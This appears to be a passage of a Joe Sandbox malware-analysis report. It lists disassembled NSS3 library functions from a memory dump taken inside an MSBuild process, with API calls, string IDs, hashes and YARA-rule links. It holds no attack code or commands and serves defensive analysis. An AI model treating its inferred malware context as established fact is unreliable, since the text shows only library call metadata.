                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Util$ArenaItem_Pool$Error$Alloc_CallCompareCopyDecodeFindFinishFreeInitOnceQuickTag_freememcmpmemcpy
                                                                                        • String ID: security
                                                                                        • API String ID: 3482804875-3315324353
                                                                                        • Opcode ID: 6c6b9562b23233158036c6cbae66cc92043fd93bdb5db7f49b46bb768e189221
                                                                                        • Instruction ID: 6245257754d8dba0b5822ec789b029345f4c3de3d1137adc2f9c25b2308a03b0
                                                                                        • Opcode Fuzzy Hash: 6c6b9562b23233158036c6cbae66cc92043fd93bdb5db7f49b46bb768e189221
                                                                                        • Instruction Fuzzy Hash: 944138B290A3106BE7008B249C44B6B77ECAF4936CF154629EC19A3B45F770E554C7EE
                                                                                        Function 6C6FAD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6FADB1
                                                                                          • Part of subcall function 6C6DBE30: SECOID_FindOID_Util.NSS3(6C69311B,00000000,?,6C69311B,?), ref: 6C6DBE44
                                                                                        • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C6FADF4
                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C6FAE08
                                                                                          • Part of subcall function 6C6DB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7B18D0,?), ref: 6C6DB095
                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6FAE25
                                                                                        • PL_FreeArenaPool.NSS3 ref: 6C6FAE63
                                                                                        • PR_CallOnce.NSS3(6C7E2AA4,6C6E12D0), ref: 6C6FAE4D
                                                                                          • Part of subcall function 6C604C70: TlsGetValue.KERNEL32(?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604C97
                                                                                          • Part of subcall function 6C604C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604CB0
                                                                                          • Part of subcall function 6C604C70: PR_Unlock.NSS3(?,?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604CC9
                                                                                        • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6FAE93
                                                                                        • PR_CallOnce.NSS3(6C7E2AA4,6C6E12D0), ref: 6C6FAECC
                                                                                        • PL_FreeArenaPool.NSS3 ref: 6C6FAEDE
                                                                                        • PL_FinishArenaPool.NSS3 ref: 6C6FAEE6
                                                                                        • PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6FAEF5
                                                                                        • PL_FinishArenaPool.NSS3 ref: 6C6FAF16
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
                                                                                        • String ID: security
                                                                                        • API String ID: 3441714441-3315324353
                                                                                        • Opcode ID: 5fd59f6613885e26a361afee31f6e970d3c9e57e8e0e49a1a9625ea15fb5cac5
                                                                                        • Instruction ID: 2295fd9ebede3d966a4e54eb8e33bf6e2d4f3a2383a3ccdb63ca7f0d83a3f6e9
                                                                                        • Opcode Fuzzy Hash: 5fd59f6613885e26a361afee31f6e970d3c9e57e8e0e49a1a9625ea15fb5cac5
                                                                                        • Instruction Fuzzy Hash: C1413AB2905310A7E7214B24DC44BBE32A9AF4631CF100625E96496F46FB35E60BC7DF
                                                                                        Function 6C6B25C0 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 94COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PR_LogPrint.NSS3(C_GetSlotList), ref: 6C6B25DD
                                                                                        • PR_LogPrint.NSS3( pulCount = 0x%p,?), ref: 6C6B262A
                                                                                          • Part of subcall function 6C7909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C790BAB
                                                                                          • Part of subcall function 6C7909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C790BBA
                                                                                          • Part of subcall function 6C7909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C790D7E
                                                                                        • PR_LogPrint.NSS3( pSlotList = 0x%p,?), ref: 6C6B260F
                                                                                          • Part of subcall function 6C7909D0: OutputDebugStringA.KERNEL32(?), ref: 6C790B88
                                                                                          • Part of subcall function 6C7909D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C790C5D
                                                                                          • Part of subcall function 6C7909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C790C8D
                                                                                          • Part of subcall function 6C7909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C790C9C
                                                                                          • Part of subcall function 6C7909D0: OutputDebugStringA.KERNEL32(?), ref: 6C790CD1
                                                                                          • Part of subcall function 6C7909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C790CEC
                                                                                          • Part of subcall function 6C7909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C790CFB
                                                                                          • Part of subcall function 6C7909D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C790D16
                                                                                          • Part of subcall function 6C7909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C790D26
                                                                                          • Part of subcall function 6C7909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C790D35
                                                                                          • Part of subcall function 6C7909D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C790D65
                                                                                          • Part of subcall function 6C7909D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C790D70
                                                                                          • Part of subcall function 6C7909D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C790D90
                                                                                          • Part of subcall function 6C7909D0: free.MOZGLUE(00000000), ref: 6C790D99
                                                                                        • PR_LogPrint.NSS3( tokenPresent = 0x%x,?), ref: 6C6B25F6
                                                                                          • Part of subcall function 6C7909D0: PR_Now.NSS3 ref: 6C790A22
                                                                                          • Part of subcall function 6C7909D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C790A35
                                                                                          • Part of subcall function 6C7909D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C790A66
                                                                                          • Part of subcall function 6C7909D0: PR_GetCurrentThread.NSS3 ref: 6C790A70
                                                                                          • Part of subcall function 6C7909D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C790A9D
                                                                                          • Part of subcall function 6C7909D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C790AC8
                                                                                          • Part of subcall function 6C7909D0: PR_vsmprintf.NSS3(?,?), ref: 6C790AE8
                                                                                          • Part of subcall function 6C7909D0: EnterCriticalSection.KERNEL32(?), ref: 6C790B19
                                                                                          • Part of subcall function 6C7909D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C790B48
                                                                                          • Part of subcall function 6C7909D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C790C76
                                                                                          • Part of subcall function 6C7909D0: PR_LogFlush.NSS3 ref: 6C790C7E
                                                                                        • PR_LogPrint.NSS3( *pulCount = 0x%x,?), ref: 6C6B2699
                                                                                        • PR_LogPrint.NSS3( slotID[%d] = %x,00000000,?), ref: 6C6B26C5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Print$DebugOutputStringfflush$fwrite$R_snprintf$CriticalCurrentEnterExplodeFlushR_vsmprintfR_vsnprintfSectionThreadTimefputcfreememcpy
                                                                                        • String ID: *pulCount = 0x%x$ pSlotList = 0x%p$ pulCount = 0x%p$ slotID[%d] = %x$ tokenPresent = 0x%x$C_GetSlotList$nyl
                                                                                        • API String ID: 2625801553-4226641309
                                                                                        • Opcode ID: 5373ca0a32c87ceeb75089b5aed4a8d651226e95418f11205278678caab5ef57
                                                                                        • Instruction ID: f2d63a9505cfd41e4088db7a22d47e8e161a9e595d1c557bbc7c590987e6c6dc
                                                                                        • Opcode Fuzzy Hash: 5373ca0a32c87ceeb75089b5aed4a8d651226e95418f11205278678caab5ef57
                                                                                        • Instruction Fuzzy Hash: AE31A132201146AFDB44DF54DE8CA4537F5BB8A35DF044475E904A7A12EF309D64CB6A
                                                                                        Function 6C698DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • TlsGetValue.KERNEL32(?,?), ref: 6C698E22
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C698E36
                                                                                        • memset.VCRUNTIME140(?,00000000,?), ref: 6C698E4F
                                                                                        • calloc.MOZGLUE(00000001,?,?,?), ref: 6C698E78
                                                                                        • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C698E9B
                                                                                        • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C698EAC
                                                                                        • PL_ArenaAllocate.NSS3(?,?), ref: 6C698EDE
                                                                                        • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C698EF0
                                                                                        • memset.VCRUNTIME140(?,00000000,?), ref: 6C698F00
                                                                                        • free.MOZGLUE(?), ref: 6C698F0E
                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C698F39
                                                                                        • memset.VCRUNTIME140(?,00000000,?), ref: 6C698F4A
                                                                                        • memset.VCRUNTIME140(?,00000000,?), ref: 6C698F5B
                                                                                        • PR_Unlock.NSS3(?), ref: 6C698F72
                                                                                        • PR_Unlock.NSS3(?), ref: 6C698F82
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
                                                                                        • String ID:
                                                                                        • API String ID: 1569127702-0
                                                                                        • Opcode ID: 92363b1d58b0824c7621a30ff66d8c0eefd034613dc7027fffe1e8bda10b86b8
                                                                                        • Instruction ID: 4cf9b32da4fab212e164fd4b01166fd47b73eadb80332d436f12989d65363f33
                                                                                        • Opcode Fuzzy Hash: 92363b1d58b0824c7621a30ff66d8c0eefd034613dc7027fffe1e8bda10b86b8
                                                                                        • Instruction Fuzzy Hash: 23512CB2D00216AFDB009F68DC889AEB7B9FF59358F15412AEC089B710E731ED4587D5
                                                                                        Function 6C6D25F0 Relevance: 21.4, APIs: 8, Strings: 6, Instructions: 403stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 6C6DA0A0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C6AA5DF,?,00000000,6C6828AD,00000000,?,6C6AA5DF,?,object), ref: 6C6DA0C0
                                                                                          • Part of subcall function 6C6DA0A0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C6AA5DF,?,00000000,6C6828AD,00000000,?,6C6AA5DF,?,object), ref: 6C6DA0E8
                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6D2834
                                                                                        • memcmp.VCRUNTIME140(00000000,00000020,00000020,?,?,?,?,?,?,?,?), ref: 6C6D284B
                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6D2A98
                                                                                        • memcmp.VCRUNTIME140(00000000,?,00000020,?,?,?,?,?,?,?,?,?,?), ref: 6C6D2AAF
                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6D2BDC
                                                                                        • memcmp.VCRUNTIME140(00000000,?,00000010,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6D2BF3
                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6D2D23
                                                                                        • memcmp.VCRUNTIME140(00000000,?,00000010,?,?,?,?,?,?,?,?,?), ref: 6C6D2D34
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcmpstrlen$strcmp
                                                                                        • String ID: $OQjl$manufacturer$model$serial$token
                                                                                        • API String ID: 2407968032-3654040745
                                                                                        • Opcode ID: a9f1e27aa470194c033675de89c78e131d34c369c3f8b544011be011047a7b98
                                                                                        • Instruction ID: c7a825711ae93cb97586c1983fdfaacc7ca363ea97a50e4b37ac9953b3eb8523
                                                                                        • Opcode Fuzzy Hash: a9f1e27aa470194c033675de89c78e131d34c369c3f8b544011be011047a7b98
                                                                                        • Instruction Fuzzy Hash: 9A02BDA1E0C3C96EF7318762C88CBE12BE09B0531CF4F15F5D9498BAA3C2AD1D999355
                                                                                        Function 6C6CEDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PORT_Alloc_Util.NSS3(?), ref: 6C6CEE0B
                                                                                          • Part of subcall function 6C6E0BE0: malloc.MOZGLUE(6C6D8D2D,?,00000000,?), ref: 6C6E0BF8
                                                                                          • Part of subcall function 6C6E0BE0: TlsGetValue.KERNEL32(6C6D8D2D,?,00000000,?), ref: 6C6E0C15
                                                                                        • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6CEEE1
                                                                                          • Part of subcall function 6C6C1D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C6C1D7E
                                                                                          • Part of subcall function 6C6C1D50: EnterCriticalSection.KERNEL32(?), ref: 6C6C1D8E
                                                                                          • Part of subcall function 6C6C1D50: PR_Unlock.NSS3(?), ref: 6C6C1DD3
                                                                                        • TlsGetValue.KERNEL32 ref: 6C6CEE51
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C6CEE65
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6CEEA2
                                                                                        • free.MOZGLUE(?), ref: 6C6CEEBB
                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C6CEED0
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6CEF48
                                                                                        • free.MOZGLUE(?), ref: 6C6CEF68
                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C6CEF7D
                                                                                        • PK11_DoesMechanism.NSS3(?,?), ref: 6C6CEFA4
                                                                                        • free.MOZGLUE(?), ref: 6C6CEFDA
                                                                                        • PR_SetError.NSS3(FFFFE040,00000000), ref: 6C6CF055
                                                                                        • free.MOZGLUE(?), ref: 6C6CF060
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
                                                                                        • String ID:
                                                                                        • API String ID: 2524771861-0
                                                                                        • Opcode ID: dcbd23c14e79c3e70b6f437fe48294fca36f6f5231b50b5557597d3c0d110009
                                                                                        • Instruction ID: a267806c175d61604f28f5d78eb4579c51e664c7a25307fb2ccc407a7369f9bc
                                                                                        • Opcode Fuzzy Hash: dcbd23c14e79c3e70b6f437fe48294fca36f6f5231b50b5557597d3c0d110009
                                                                                        • Instruction Fuzzy Hash: CF819FB1A00209ABDF00DFA4DC85ADE7BB5FF0D358F144024E919A3711EB35E925CBA6
                                                                                        Function 6C694CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PK11_SignatureLen.NSS3(?), ref: 6C694D80
                                                                                        • PORT_Alloc_Util.NSS3(00000000), ref: 6C694D95
                                                                                        • PORT_NewArena_Util.NSS3(00000800), ref: 6C694DF2
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C694E2C
                                                                                        • PR_SetError.NSS3(FFFFE028,00000000), ref: 6C694E43
                                                                                        • PORT_NewArena_Util.NSS3(00000800), ref: 6C694E58
                                                                                        • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C694E85
                                                                                        • DER_Encode_Util.NSS3(?,?,6C7E05A4,00000000), ref: 6C694EA7
                                                                                        • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C694F17
                                                                                        • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C694F45
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C694F62
                                                                                        • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C694F7A
                                                                                        • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C694F89
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C694FC8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                        • String ID:
                                                                                        • API String ID: 2843999940-0
                                                                                        • Opcode ID: 786d3f64a01f95433209c31ab9e69ad161ceebd52afff29a7aafc734da50ff26
                                                                                        • Instruction ID: 2d04582982685d0625641199eb556554f86d260633fade1ac5e73a7eb248ec63
                                                                                        • Opcode Fuzzy Hash: 786d3f64a01f95433209c31ab9e69ad161ceebd52afff29a7aafc734da50ff26
                                                                                        • Instruction Fuzzy Hash: CB81A4719083029FE701CF24D840BABB7E4AFC9358F14852DF969DB641EB71E905CB9A
                                                                                        Function 6C690470 Relevance: 21.2, APIs: 14, Instructions: 206timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PORT_NewArena_Util.NSS3(00000800), ref: 6C6904B7
                                                                                          • Part of subcall function 6C6E0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6887ED,00000800,6C67EF74,00000000), ref: 6C6E1000
                                                                                          • Part of subcall function 6C6E0FF0: PR_NewLock.NSS3(?,00000800,6C67EF74,00000000), ref: 6C6E1016
                                                                                          • Part of subcall function 6C6E0FF0: PL_InitArenaPool.NSS3(00000000,security,6C6887ED,00000008,?,00000800,6C67EF74,00000000), ref: 6C6E102B
                                                                                        • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C690539
                                                                                          • Part of subcall function 6C6E1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C6888A4,00000000,00000000), ref: 6C6E1228
                                                                                          • Part of subcall function 6C6E1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C6E1238
                                                                                          • Part of subcall function 6C6E1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C6888A4,00000000,00000000), ref: 6C6E124B
                                                                                          • Part of subcall function 6C6E1200: PR_CallOnce.NSS3(6C7E2AA4,6C6E12D0,00000000,00000000,00000000,?,6C6888A4,00000000,00000000), ref: 6C6E125D
                                                                                          • Part of subcall function 6C6E1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C6E126F
                                                                                          • Part of subcall function 6C6E1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C6E1280
                                                                                          • Part of subcall function 6C6E1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C6E128E
                                                                                          • Part of subcall function 6C6E1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C6E129A
                                                                                          • Part of subcall function 6C6E1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C6E12A1
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C69054A
                                                                                        • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C69056D
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6905CA
                                                                                        • DER_GeneralizedTimeToTime_Util.NSS3(?,?), ref: 6C6905EA
                                                                                        • PR_SetError.NSS3(FFFFE00C,00000000), ref: 6C6905FD
                                                                                        • PR_SetError.NSS3(FFFFE07E,00000000), ref: 6C690621
                                                                                        • PR_EnterMonitor.NSS3 ref: 6C69063E
                                                                                        • PR_ExitMonitor.NSS3 ref: 6C690668
                                                                                        • CERT_DestroyCertificate.NSS3(?), ref: 6C690697
                                                                                        • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C6906AC
                                                                                        • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C6906CC
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6906DA
                                                                                          • Part of subcall function 6C68E6B0: PORT_ArenaMark_Util.NSS3(00000000,?,00000000,?,?,6C6904DC,?,?), ref: 6C68E6C9
                                                                                          • Part of subcall function 6C68E6B0: PORT_ArenaAlloc_Util.NSS3(00000000,00000088,?,?,00000000,?,?,6C6904DC,?,?), ref: 6C68E6D9
                                                                                          • Part of subcall function 6C68E6B0: memset.VCRUNTIME140(00000000,00000000,00000088,?,?,?,?,00000000,?,?,6C6904DC,?,?), ref: 6C68E6F4
                                                                                          • Part of subcall function 6C68E6B0: SECOID_SetAlgorithmID_Util.NSS3(00000000,00000000,00000004,00000000,?,?,?,?,?,?,?,00000000,?,?,6C6904DC,?), ref: 6C68E703
                                                                                          • Part of subcall function 6C68E6B0: CERT_FindCertIssuer.NSS3(?,?,6C6904DC,0000000B,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C68E71E
                                                                                          • Part of subcall function 6C68F660: PR_EnterMonitor.NSS3(6C69050F,?,00000001,?,?,?), ref: 6C68F6A8
                                                                                          • Part of subcall function 6C68F660: PR_Now.NSS3(?,?,?,00000001,?,?,?), ref: 6C68F6C1
                                                                                          • Part of subcall function 6C68F660: PR_ExitMonitor.NSS3(?,?,?,00000001,?,?,?), ref: 6C68F7C8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Util$ArenaArena_ErrorFree$Monitor$EnterPool$CriticalExitSectionfree$AlgorithmAlloc_CallCertCertificateClearDeleteDestroyFindGeneralizedInitIssuerLockMark_OnceTimeTime_UnlockValuecallocmemset
                                                                                        • String ID:
                                                                                        • API String ID: 2470852775-0
                                                                                        • Opcode ID: b1b709608c2c28a22a3d587d930b527d9b6cab06fe80c4f736a775044691b8f2
                                                                                        • Instruction ID: 82d3d0f6e40d8ea52b545bfaa2655a4731fa3f7f9b239528b41d16286cda88eb
                                                                                        • Opcode Fuzzy Hash: b1b709608c2c28a22a3d587d930b527d9b6cab06fe80c4f736a775044691b8f2
                                                                                        • Instruction Fuzzy Hash: F861E771A08342AFEB00DF28CD44B9B77E4AF88358F144529F955D7791EB30E918CB9A
